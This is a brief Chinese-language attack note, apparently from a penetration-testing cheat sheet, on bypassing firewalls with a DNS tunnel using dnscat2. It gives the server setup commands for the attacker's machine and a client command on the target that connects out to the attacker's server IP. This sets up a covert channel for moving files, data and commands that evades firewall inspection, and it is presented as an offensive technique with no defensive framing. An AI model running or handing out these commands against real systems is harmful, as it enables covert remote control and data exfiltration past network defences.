[TOC]

0x01 使用 DNS 隧道绕过防火墙
描述:让数据和命令使用 DNS 隧道传输以绕过防火墙的检查;dnscat2 支持从目标主机上面上传和下载命令来获取文件、数据和程序

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
# 服务器 (攻击者)
$ apt-get update
$ apt-get -y install ruby-dev git make g++
$ gem install bundler
$ git clone https://github.com/iagox86/dnscat2.git
$ cd dnscat2/server
$ bundle install
$ ruby ./dnscat2.rb
dnscat2> New session established: 16059
dnscat2> session -i 16059
 
# 客户机 (目标)
# https://downloads.skullsecurity.org/dnscat2/   #linux
# https://github.com/lukebaggett/dnscat2-powershell #window
$ dnscat --host <dnscat server_ip>